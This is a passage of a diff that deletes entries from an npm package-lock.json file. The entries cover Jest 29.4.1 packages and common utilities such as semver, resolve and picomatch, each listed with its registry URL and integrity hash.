"^29.4.1" - } - }, - "jest-matcher-utils": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-matcher-utils/-/jest-matcher-utils-29.4.1.tgz", - "integrity": "sha512-k5h0u8V4nAEy6lSACepxL/rw78FLDkBnXhZVgFneVpnJONhb2DhZj/Gv4eNe+1XqQ5IhgUcqj745UwH0HJmMnA==", - "dev": true, - "requires": { - "chalk": "^4.0.0", - "jest-diff": "^29.4.1", - "jest-get-type": "^29.2.0", - "pretty-format": "^29.4.1" - } - }, - "jest-message-util": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-message-util/-/jest-message-util-29.4.1.tgz", - "integrity": "sha512-H4/I0cXUaLeCw6FM+i4AwCnOwHRgitdaUFOdm49022YD5nfyr8C/DrbXOBEyJaj+w/y0gGJ57klssOaUiLLQGQ==", - "dev": true, - "requires": { - "@babel/code-frame": "^7.12.13", - "@jest/types": "^29.4.1", - "@types/stack-utils": "^2.0.0", - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "micromatch": "^4.0.4", - "pretty-format": "^29.4.1", - "slash": "^3.0.0", - "stack-utils": "^2.0.3" - } - }, - "jest-mock": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-mock/-/jest-mock-29.4.1.tgz", - "integrity": "sha512-MwA4hQ7zBOcgVCVnsM8TzaFLVUD/pFWTfbkY953Y81L5ret3GFRZtmPmRFAjKQSdCKoJvvqOu6Bvfpqlwwb0dQ==", - "dev": true, - "requires": { - "@jest/types": "^29.4.1", - "@types/node": "*", - "jest-util": "^29.4.1" - } - }, - "jest-pnp-resolver": { - "version": "1.2.3", - "resolved": "https://registry.npmjs.org/jest-pnp-resolver/-/jest-pnp-resolver-1.2.3.tgz", - "integrity": "sha512-+3NpwQEnRoIBtx4fyhblQDPgJI0H1IEIkX7ShLUjPGA7TtUTvI1oiKi3SR4oBR0hQhQR80l4WAe5RrXBwWMA8w==", - "dev": true, - "requires": {} - }, - "jest-regex-util": { - "version": "29.2.0", - "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-29.2.0.tgz", - "integrity": "sha512-6yXn0kg2JXzH30cr2NlThF+70iuO/3irbaB4mh5WyqNIvLLP+B6sFdluO1/1RJmslyh/f9osnefECflHvTbwVA==", - "dev": true - }, - "jest-resolve": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-resolve/-/jest-resolve-29.4.1.tgz", - "integrity": "sha512-j/ZFNV2lm9IJ2wmlq1uYK0Y/1PiyDq9g4HEGsNTNr3viRbJdV+8Lf1SXIiLZXFvyiisu0qUyIXGBnw+OKWkJwQ==", - "dev": true, - "requires": { - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.4.1", - "jest-pnp-resolver": "^1.2.2", - "jest-util": "^29.4.1", - "jest-validate": "^29.4.1", - "resolve": "^1.20.0", - "resolve.exports": "^2.0.0", - "slash": "^3.0.0" - } - }, - "jest-resolve-dependencies": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-resolve-dependencies/-/jest-resolve-dependencies-29.4.1.tgz", - "integrity": "sha512-Y3QG3M1ncAMxfjbYgtqNXC5B595zmB6e//p/qpA/58JkQXu/IpLDoLeOa8YoYfsSglBKQQzNUqtfGJJT/qLmJg==", - "dev": true, - "requires": { - "jest-regex-util": "^29.2.0", - "jest-snapshot": "^29.4.1" - } - }, - "jest-runner": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-runner/-/jest-runner-29.4.1.tgz", - "integrity": "sha512-8d6XXXi7GtHmsHrnaqBKWxjKb166Eyj/ksSaUYdcBK09VbjPwIgWov1VwSmtupCIz8q1Xv4Qkzt/BTo3ZqiCeg==", - "dev": true, - "requires": { - "@jest/console": "^29.4.1", - "@jest/environment": "^29.4.1", - "@jest/test-result": "^29.4.1", - "@jest/transform": "^29.4.1", - "@jest/types": "^29.4.1", - "@types/node": "*", - "chalk": "^4.0.0", - "emittery": "^0.13.1", - "graceful-fs": "^4.2.9", - "jest-docblock": "^29.2.0", - "jest-environment-node": "^29.4.1", - "jest-haste-map": "^29.4.1", - "jest-leak-detector": "^29.4.1", - "jest-message-util": "^29.4.1", - "jest-resolve": "^29.4.1", - "jest-runtime": "^29.4.1", - "jest-util": "^29.4.1", - "jest-watcher": "^29.4.1", - "jest-worker": "^29.4.1", - "p-limit": "^3.1.0", - "source-map-support": "0.5.13" - } - }, - "jest-runtime": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-runtime/-/jest-runtime-29.4.1.tgz", - "integrity": "sha512-UXTMU9uKu2GjYwTtoAw5rn4STxWw/nadOfW7v1sx6LaJYa3V/iymdCLQM6xy3+7C6mY8GfX22vKpgxY171UIoA==", - "dev": true, - "requires": { - "@jest/environment": "^29.4.1", - "@jest/fake-timers": "^29.4.1", - "@jest/globals": "^29.4.1", - "@jest/source-map": "^29.2.0", - "@jest/test-result": "^29.4.1", - "@jest/transform": "^29.4.1", - "@jest/types": "^29.4.1", - "@types/node": "*", - "chalk": "^4.0.0", - "cjs-module-lexer": "^1.0.0", - "collect-v8-coverage": "^1.0.0", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.4.1", - "jest-message-util": "^29.4.1", - "jest-mock": "^29.4.1", - "jest-regex-util": "^29.2.0", - "jest-resolve": "^29.4.1", - "jest-snapshot": "^29.4.1", - "jest-util": "^29.4.1", - "semver": "^7.3.5", - "slash": "^3.0.0", - "strip-bom": "^4.0.0" - }, - "dependencies": { - "lru-cache": { - "version": "6.0.0", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", - "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", - "dev": true, - "requires": { - "yallist": "^4.0.0" - } - }, - "semver": { - "version": "7.5.4", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.5.4.tgz", - "integrity": "sha512-1bCSESV6Pv+i21Hvpxp3Dx+pSD8lIPt8uVjRrxAUt/nbswYc+tK6Y2btiULjd4+fnq15PX+nqQDC7Oft7WkwcA==", - "dev": true, - "requires": { - "lru-cache": "^6.0.0" - } - }, - "yallist": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", - "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==", - "dev": true - } - } - }, - "jest-snapshot": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-snapshot/-/jest-snapshot-29.4.1.tgz", - "integrity": "sha512-l4iV8EjGgQWVz3ee/LR9sULDk2pCkqb71bjvlqn+qp90lFwpnulHj4ZBT8nm1hA1C5wowXLc7MGnw321u0tsYA==", - "dev": true, - "requires": { - "@babel/core": "^7.11.6", - "@babel/generator": "^7.7.2", - "@babel/plugin-syntax-jsx": "^7.7.2", - "@babel/plugin-syntax-typescript": "^7.7.2", - "@babel/traverse": "^7.7.2", - "@babel/types": "^7.3.3", - "@jest/expect-utils": "^29.4.1", - "@jest/transform": "^29.4.1", - "@jest/types": "^29.4.1", - "@types/babel__traverse": "^7.0.6", - "@types/prettier": "^2.1.5", - "babel-preset-current-node-syntax": "^1.0.0", - "chalk": "^4.0.0", - "expect": "^29.4.1", - "graceful-fs": "^4.2.9", - "jest-diff": "^29.4.1", - "jest-get-type": "^29.2.0", - "jest-haste-map": "^29.4.1", - "jest-matcher-utils": "^29.4.1", - "jest-message-util": "^29.4.1", - "jest-util": "^29.4.1", - "natural-compare": "^1.4.0", - "pretty-format": "^29.4.1", - "semver": "^7.3.5" - }, - "dependencies": { - "lru-cache": { - "version": "6.0.0", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", - "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", - "dev": true, - "requires": { - "yallist": "^4.0.0" - } - }, - "semver": { - "version": "7.5.4", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.5.4.tgz", - "integrity": "sha512-1bCSESV6Pv+i21Hvpxp3Dx+pSD8lIPt8uVjRrxAUt/nbswYc+tK6Y2btiULjd4+fnq15PX+nqQDC7Oft7WkwcA==", - "dev": true, - "requires": { - "lru-cache": "^6.0.0" - } - }, - "yallist": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", - "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==", - "dev": true - } - } - }, - "jest-util": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-util/-/jest-util-29.4.1.tgz", - "integrity": "sha512-bQy9FPGxVutgpN4VRc0hk6w7Hx/m6L53QxpDreTZgJd9gfx/AV2MjyPde9tGyZRINAUrSv57p2inGBu2dRLmkQ==", - "dev": true, - "requires": { - "@jest/types": "^29.4.1", - "@types/node": "*", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "graceful-fs": "^4.2.9", - "picomatch": "^2.2.3" - } - }, - "jest-validate": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-validate/-/jest-validate-29.4.1.tgz", - "integrity": "sha512-qNZXcZQdIQx4SfUB/atWnI4/I2HUvhz8ajOSYUu40CSmf9U5emil8EDHgE7M+3j9/pavtk3knlZBDsgFvv/SWw==", - "dev": true, - "requires": { - "@jest/types": "^29.4.1", - "camelcase": "^6.2.0", - "chalk": "^4.0.0", - "jest-get-type": "^29.2.0", - "leven": "^3.1.0", - "pretty-format": "^29.4.1" - }, - "dependencies": { - "camelcase": { - "version": "6.3.0", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-6.3.0.tgz", - "integrity": "sha512-Gmy6FhYlCY7uOElZUSbxo2UCDH8owEk996gkbrpsgGtrJLM3J7jGxl9Ic7Qwwj4ivOE5AWZWRMecDdF7hqGjFA==", - "dev": true - } - } - }, - "jest-watcher": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-watcher/-/jest-watcher-29.4.1.tgz", - "integrity": "sha512-vFOzflGFs27nU6h8dpnVRER3O2rFtL+VMEwnG0H3KLHcllLsU8y9DchSh0AL/Rg5nN1/wSiQ+P4ByMGpuybaVw==", - "dev": true, - "requires": { - "@jest/test-result": "^29.4.1", - "@jest/types": "^29.4.1", - "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "emittery": "^0.13.1", - "jest-util": "^29.4.1", - "string-length": "^4.0.1" - } - }, - "jest-worker": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-worker/-/jest-worker-29.4.1.tgz", - "integrity": "sha512-O9doU/S1EBe+yp/mstQ0VpPwpv0Clgn68TkNwGxL6/usX/KUW9Arnn4ag8C3jc6qHcXznhsT5Na1liYzAsuAbQ==", - "dev": true, - "requires": { - "@types/node": "*", - "jest-util": "^29.4.1", - "merge-stream": "^2.0.0", - "supports-color": "^8.0.0" - }, - "dependencies": { - "supports-color": { - "version": "8.1.1", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-8.1.1.tgz", - "integrity": "sha512-MpUEN2OodtUzxvKQl72cUF7RQ5EiHsGvSsVG0ia9c5RbWGL2CI4C7EpPS8UTBIplnlzZiNuV56w+FuNxy3ty2Q==", - "dev": true, - "requires": { - "has-flag": "^4.0.0" - } - } - } - }, - "js-tokens": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/js-tokens/-/js-tokens-4.0.0.tgz", - "integrity": "sha512-RdJUflcE3cUzKiMqQgsCu06FPu9UdIJO0beYbPhHN4k6apgJtifcoCtT9bcxOpYBtpD2kCM6Sbzg4CausW/PKQ==", - "dev": true - }, - "js-yaml": { - "version": "3.14.1", - "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-3.14.1.tgz", - "integrity": "sha512-okMH7OXXJ7YrN9Ok3/SXrnu4iX9yOk+25nqX4imS2npuvTYDmo/QEZoqwZkYaIDk3jVvBOTOIEgEhaLOynBS9g==", - "dev": true, - "requires": { - "argparse": "^1.0.7", - "esprima": "^4.0.0" - } - }, - "jsesc": { - "version": "2.5.2", - "resolved": "https://registry.npmjs.org/jsesc/-/jsesc-2.5.2.tgz", - "integrity": "sha512-OYu7XEzjkCQ3C5Ps3QIZsQfNpqoJyZZA99wd9aWd05NCtC5pWOkShK2mkL6HXQR6/Cy2lbNdPlZBpuQHXE63gA==", - "dev": true - }, - "json-parse-even-better-errors": { - "version": "2.3.1", - "resolved": "https://registry.npmjs.org/json-parse-even-better-errors/-/json-parse-even-better-errors-2.3.1.tgz", - "integrity": "sha512-xyFwyhro/JEof6Ghe2iz2NcXoj2sloNsWr/XsERDK/oiPCfaNhl5ONfp+jQdAZRQQ0IJWNzH9zIZF7li91kh2w==", - "dev": true - }, - "json5": { - "version": "2.2.3", - "resolved": "https://registry.npmjs.org/json5/-/json5-2.2.3.tgz", - "integrity": "sha512-XmOWe7eyHYH14cLdVPoyg+GOH3rYX++KpzrylJwSW98t3Nk+U8XOl8FWKOgwtzdb8lXGf6zYwDUzeHMWfxasyg==", - "dev": true - }, - "kleur": { - "version": "3.0.3", - "resolved": "https://registry.npmjs.org/kleur/-/kleur-3.0.3.tgz", - "integrity": "sha512-eTIzlVOSUR+JxdDFepEYcBMtZ9Qqdef+rnzWdRZuMbOywu5tO2w2N7rqjoANZ5k9vywhL6Br1VRjUIgTQx4E8w==", - "dev": true - }, - "leven": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/leven/-/leven-3.1.0.tgz", - "integrity": "sha512-qsda+H8jTaUaN/x5vzW2rzc+8Rw4TAQ/4KjB46IwK5VH+IlVeeeje/EoZRpiXvIqjFgK84QffqPztGI3VBLG1A==", - "dev": true - }, - "lines-and-columns": { - "version": "1.2.4", - "resolved": "https://registry.npmjs.org/lines-and-columns/-/lines-and-columns-1.2.4.tgz", - "integrity": "sha512-7ylylesZQ/PV29jhEDl3Ufjo6ZX7gCqJr5F7PKrqc93v7fzSymt1BpwEU8nAUXs8qzzvqhbjhK5QZg6Mt/HkBg==", - "dev": true - }, - "locate-path": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/locate-path/-/locate-path-5.0.0.tgz", - "integrity": "sha512-t7hw9pI+WvuwNJXwk5zVHpyhIqzg2qTlklJOf0mVxGSbe3Fp2VieZcduNYjaLDoy6p9uGpQEGWG87WpMKlNq8g==", - "dev": true, - "requires": { - "p-locate": "^4.1.0" - } - }, - "lru-cache": { - "version": "5.1.1", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-5.1.1.tgz", - "integrity": "sha512-KpNARQA3Iwv+jTA0utUVVbrh+Jlrr1Fv0e56GGzAFOXN7dk/FviaDW8LHmK52DlcH4WP2n6gI8vN1aesBFgo9w==", - "dev": true, - "requires": { - "yallist": "^3.0.2" - } - }, - "make-dir": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/make-dir/-/make-dir-3.1.0.tgz", - "integrity": "sha512-g3FeP20LNwhALb/6Cz6Dd4F2ngze0jz7tbzrD2wAV+o9FeNHe4rL+yK2md0J/fiSf1sa1ADhXqi5+oVwOM/eGw==", - "dev": true, - "requires": { - "semver": "^6.0.0" - } - }, - "makeerror": { - "version": "1.0.12", - "resolved": "https://registry.npmjs.org/makeerror/-/makeerror-1.0.12.tgz", - "integrity": "sha512-JmqCvUhmt43madlpFzG4BQzG2Z3m6tvQDNKdClZnO3VbIudJYmxsT0FNJMeiB2+JTSlTQTSbU8QdesVmwJcmLg==", - "dev": true, - "requires": { - "tmpl": "1.0.5" - } - }, - "merge-stream": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/merge-stream/-/merge-stream-2.0.0.tgz", - "integrity": "sha512-abv/qOcuPfk3URPfDzmZU1LKmuw8kT+0nIHvKrKgFrwifol/doWcdA4ZqsWQ8ENrFKkd67Mfpo/LovbIUsbt3w==", - "dev": true - }, - "micromatch": { - "version": "4.0.5", - "resolved": "https://registry.npmjs.org/micromatch/-/micromatch-4.0.5.tgz", - "integrity": "sha512-DMy+ERcEW2q8Z2Po+WNXuw3c5YaUSFjAO5GsJqfEl7UjvtIuFKO6ZrKvcItdy98dwFI2N1tg3zNIdKaQT+aNdA==", - "dev": true, - "requires": { - "braces": "^3.0.2", - "picomatch": "^2.3.1" - } - }, - "mimic-fn": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/mimic-fn/-/mimic-fn-2.1.0.tgz", - "integrity": "sha512-OqbOk5oEQeAZ8WXWydlu9HJjz9WVdEIvamMCcXmuqUYjTknH/sqsWvhQ3vgwKFRR1HpjvNBKQ37nbJgYzGqGcg==", - "dev": true - }, - "minimatch": { - "version": "3.1.2", - "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.1.2.tgz", - "integrity": "sha512-J7p63hRiAjw1NDEww1W7i37+ByIrOWO5XQQAzZ3VOcL0PNybwpfmV/N05zFAzwQ9USyEcX6t3UO+K5aqBQOIHw==", - "dev": true, - "requires": { - "brace-expansion": "^1.1.7" - } - }, - "ms": { - "version": "2.1.2", - "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", - "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==", - "dev": true - }, - "natural-compare": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/natural-compare/-/natural-compare-1.4.0.tgz", - "integrity": "sha512-OWND8ei3VtNC9h7V60qff3SVobHr996CTwgxubgyQYEpg290h9J0buyECNNJexkFm5sOajh5G116RYA1c8ZMSw==", - "dev": true - }, - "node-int64": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/node-int64/-/node-int64-0.4.0.tgz", - "integrity": "sha512-O5lz91xSOeoXP6DulyHfllpq+Eg00MWitZIbtPfoSEvqIHdl5gfcY6hYzDWnj0qD5tz52PI08u9qUvSVeUBeHw==", - "dev": true - }, - "node-releases": { - "version": "2.0.9", - "resolved": "https://registry.npmjs.org/node-releases/-/node-releases-2.0.9.tgz", - "integrity": "sha512-2xfmOrRkGogbTK9R6Leda0DGiXeY3p2NJpy4+gNCffdUvV6mdEJnaDEic1i3Ec2djAo8jWYoJMR5PB0MSMpxUA==", - "dev": true - }, - "normalize-path": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/normalize-path/-/normalize-path-3.0.0.tgz", - "integrity": "sha512-6eZs5Ls3WtCisHWp9S2GUy8dqkpGi4BVSz3GaqiE6ezub0512ESztXUwUB6C6IKbQkY2Pnb/mD4WYojCRwcwLA==", - "dev": true - }, - "npm-run-path": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/npm-run-path/-/npm-run-path-4.0.1.tgz", - "integrity": "sha512-S48WzZW777zhNIrn7gxOlISNAqi9ZC/uQFnRdbeIHhZhCA6UqpkOT8T1G7BvfdgP4Er8gF4sUbaS0i7QvIfCWw==", - "dev": true, - "requires": { - "path-key": "^3.0.0" - } - }, - "once": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", - "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", - "dev": true, - "requires": { - "wrappy": "1" - } - }, - "onetime": { - "version": "5.1.2", - "resolved": "https://registry.npmjs.org/onetime/-/onetime-5.1.2.tgz", - "integrity": "sha512-kbpaSSGJTWdAY5KPVeMOKXSrPtr8C8C7wodJbcsd51jRnmD+GZu8Y0VoU6Dm5Z4vWr0Ig/1NKuWRKf7j5aaYSg==", - "dev": true, - "requires": { - "mimic-fn": "^2.1.0" - } - }, - "p-limit": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-3.1.0.tgz", - "integrity": "sha512-TYOanM3wGwNGsZN2cVTYPArw454xnXj5qmWF1bEoAc4+cU/ol7GVh7odevjp1FNHduHc3KZMcFduxU5Xc6uJRQ==", - "dev": true, - "requires": { - "yocto-queue": "^0.1.0" - } - }, - "p-locate": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/p-locate/-/p-locate-4.1.0.tgz", - "integrity": "sha512-R79ZZ/0wAxKGu3oYMlz8jy/kbhsNrS7SKZ7PxEHBgJ5+F2mtFW2fK2cOtBh1cHYkQsbzFV7I+EoRKe6Yt0oK7A==", - "dev": true, - "requires": { - "p-limit": "^2.2.0" - }, - "dependencies": { - "p-limit": { - "version": "2.3.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-2.3.0.tgz", - "integrity": "sha512-//88mFWSJx8lxCzwdAABTJL2MyWB12+eIY7MDL2SqLmAkeKU9qxRvWuSyTjm3FUmpBEMuFfckAIqEaVGUDxb6w==", - "dev": true, - "requires": { - "p-try": "^2.0.0" - } - } - } - }, - "p-try": { - "version": "2.2.0", - "resolved": "https://registry.npmjs.org/p-try/-/p-try-2.2.0.tgz", - "integrity": "sha512-R4nPAVTAU0B9D35/Gk3uJf/7XYbQcyohSKdvAxIRSNghFl4e71hVoGnBNQz9cWaXxO2I10KTC+3jMdvvoKw6dQ==", - "dev": true - }, - "parse-json": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/parse-json/-/parse-json-5.2.0.tgz", - "integrity": "sha512-ayCKvm/phCGxOkYRSCM82iDwct8/EonSEgCSxWxD7ve6jHggsFl4fZVQBPRNgQoKiuV/odhFrGzQXZwbifC8Rg==", - "dev": true, - "requires": { - "@babel/code-frame": "^7.0.0", - "error-ex": "^1.3.1", - "json-parse-even-better-errors": "^2.3.0", - "lines-and-columns": "^1.1.6" - } - }, - "path-exists": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/path-exists/-/path-exists-4.0.0.tgz", - "integrity": "sha512-ak9Qy5Q7jYb2Wwcey5Fpvg2KoAc/ZIhLSLOSBmRmygPsGwkVVt0fZa0qrtMz+m6tJTAHfZQ8FnmB4MG4LWy7/w==", - "dev": true - }, - "path-is-absolute": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/path-is-absolute/-/path-is-absolute-1.0.1.tgz", - "integrity": "sha512-AVbw3UJ2e9bq64vSaS9Am0fje1Pa8pbGqTTsmXfaIiMpnr5DlDhfJOuLj9Sf95ZPVDAUerDfEk88MPmPe7UCQg==", - "dev": true - }, - "path-key": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/path-key/-/path-key-3.1.1.tgz", - "integrity": "sha512-ojmeN0qd+y0jszEtoY48r0Peq5dwMEkIlCOu6Q5f41lfkswXuKtYrhgoTpLnyIcHm24Uhqx+5Tqm2InSwLhE6Q==", - "dev": true - }, - "path-parse": { - "version": "1.0.7", - "resolved": "https://registry.npmjs.org/path-parse/-/path-parse-1.0.7.tgz", - "integrity": "sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw==", - "dev": true - }, - "picocolors": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/picocolors/-/picocolors-1.0.0.tgz", - "integrity": "sha512-1fygroTLlHu66zi26VoTDv8yRgm0Fccecssto+MhsZ0D/DGW2sm8E8AjW7NU5VVTRt5GxbeZ5qBuJr+HyLYkjQ==", - "dev": true - }, - "picomatch": { - "version": "2.3.1", - "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-2.3.1.tgz", - "integrity": "sha512-JU3teHTNjmE2VCGFzuY8EXzCDVwEqB2a8fsIvwaStHhAWJEeVd1o1QD80CU6+ZdEXXSLbSsuLwJjkCBWqRQUVA==", - "dev": true - }, - "pirates": { - "version": "4.0.5", - "resolved": "https://registry.npmjs.org/pirates/-/pirates-4.0.5.tgz", - "integrity": "sha512-8V9+HQPupnaXMA23c5hvl69zXvTwTzyAYasnkb0Tts4XvO4CliqONMOnvlq26rkhLC3nWDFBJf73LU1e1VZLaQ==", - "dev": true - }, - "pkg-dir": { - "version": "4.2.0", - "resolved": "https://registry.npmjs.org/pkg-dir/-/pkg-dir-4.2.0.tgz", - "integrity": "sha512-HRDzbaKjC+AOWVXxAU/x54COGeIv9eb+6CkDSQoNTt4XyWoIJvuPsXizxu/Fr23EiekbtZwmh1IcIG/l/a10GQ==", - "dev": true, - "requires": { - "find-up": "^4.0.0" - } - }, - "pretty-format": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/pretty-format/-/pretty-format-29.4.1.tgz", - "integrity": "sha512-dt/Z761JUVsrIKaY215o1xQJBGlSmTx/h4cSqXqjHLnU1+Kt+mavVE7UgqJJO5ukx5HjSswHfmXz4LjS2oIJfg==", - "dev": true, - "requires": { - "@jest/schemas": "^29.4.0", - "ansi-styles": "^5.0.0", - "react-is": "^18.0.0" - }, - "dependencies": { - "ansi-styles": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-5.2.0.tgz", - "integrity": "sha512-Cxwpt2SfTzTtXcfOlzGEee8O+c+MmUgGrNiBcXnuWxuFJHe6a5Hz7qwhwe5OgaSYI0IJvkLqWX1ASG+cJOkEiA==", - "dev": true - } - } - }, - "prompts": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/prompts/-/prompts-2.4.2.tgz", - "integrity": "sha512-NxNv/kLguCA7p3jE8oL2aEBsrJWgAakBpgmgK6lpPWV+WuOmY6r2/zbAVnP+T8bQlA0nzHXSJSJW0Hq7ylaD2Q==", - "dev": true, - "requires": { - "kleur": "^3.0.3", - "sisteransi": "^1.0.5" - } - }, - "react-is": { - "version": "18.2.0", - "resolved": "https://registry.npmjs.org/react-is/-/react-is-18.2.0.tgz", - "integrity": "sha512-xWGDIW6x921xtzPkhiULtthJHoJvBbF3q26fzloPCK0hsvxtPVelvftw3zjbHWSkR2km9Z+4uxbDDK/6Zw9B8w==", - "dev": true - }, - "require-directory": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/require-directory/-/require-directory-2.1.1.tgz", - "integrity": "sha512-fGxEI7+wsG9xrvdjsrlmL22OMTTiHRwAMroiEeMgq8gzoLC/PQr7RsRDSTLUg/bZAZtF+TVIkHc6/4RIKrui+Q==", - "dev": true - }, - "resolve": { - "version": "1.22.1", - "resolved": "https://registry.npmjs.org/resolve/-/resolve-1.22.1.tgz", - "integrity": "sha512-nBpuuYuY5jFsli/JIs1oldw6fOQCBioohqWZg/2hiaOybXOft4lonv85uDOKXdf8rhyK159cxU5cDcK/NKk8zw==", - "dev": true, - "requires": { - "is-core-module": "^2.9.0", - "path-parse": "^1.0.7", - "supports-preserve-symlinks-flag": "^1.0.0" - } - }, - "resolve-cwd": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/resolve-cwd/-/resolve-cwd-3.0.0.tgz", - "integrity": "sha512-OrZaX2Mb+rJCpH/6CpSqt9xFVpN++x01XnN2ie9g6P5/3xelLAkXWVADpdz1IHD/KFfEXyE6V0U01OQ3UO2rEg==", - "dev": true, - "requires": { - "resolve-from": "^5.0.0" - } - }, - "resolve-from": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/resolve-from/-/resolve-from-5.0.0.tgz", - "integrity": "sha512-qYg9KP24dD5qka9J47d0aVky0N+b4fTU89LN9iDnjB5waksiC49rvMB0PrUJQGoTmH50XPiqOvAjDfaijGxYZw==", - "dev": true - }, - "resolve.exports": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/resolve.exports/-/resolve.exports-2.0.0.tgz", - "integrity": "sha512-6K/gDlqgQscOlg9fSRpWstA8sYe8rbELsSTNpx+3kTrsVCzvSl0zIvRErM7fdl9ERWDsKnrLnwB+Ne89918XOg==", - "dev": true - }, - "semver": { - "version": "6.3.1", - "resolved": "https://registry.npmjs.org/semver/-/semver-6.3.1.tgz", - "integrity": "sha512-BR7VvDCVHO+q2xBEWskxS6DJE1qRnb7DxzUrogb71CWoSficBxYsiAGd+Kl0mmq/MprG9yArRkyrQxTO6XjMzA==", - "dev": true - }, - "shebang-command": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/shebang-command/-/shebang-command-2.0.0.tgz", - "integrity": "sha512-kHxr2zZpYtdmrN1qDjrrX/Z1rR1kG8Dx+gkpK1G4eXmvXswmcE1hTWBWYUzlraYw1/yZp6YuDY77YtvbN0dmDA==", - "dev": true, - "requires": { - "shebang-regex": "^3.0.0" - } - }, - "shebang-regex": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/shebang-regex/-/shebang-regex-3.0.0.tgz", - "integrity": "sha512-7++dFhtcx3353uBaq8DDR4NuxBetBzC7ZQOhmTQInHEd6bSrXdiEyzCvG07Z44UYdLShWUyXt5M/yhz8ekcb1A==", - "dev": true - }, - "signal-exit": { - "version": "3.0.7", - "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-3.0.7.tgz", - "integrity": "sha512-wnD2ZE+l+SPC/uoS0vXeE9L1+0wuaMqKlfz9AMUo38JsyLSBWSFcHR1Rri62LZc12vLr1gb3jl7iwQhgwpAbGQ==", - "dev": true - }, - "sisteransi": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/sisteransi/-/sisteransi-1.0.5.tgz", - "integrity": 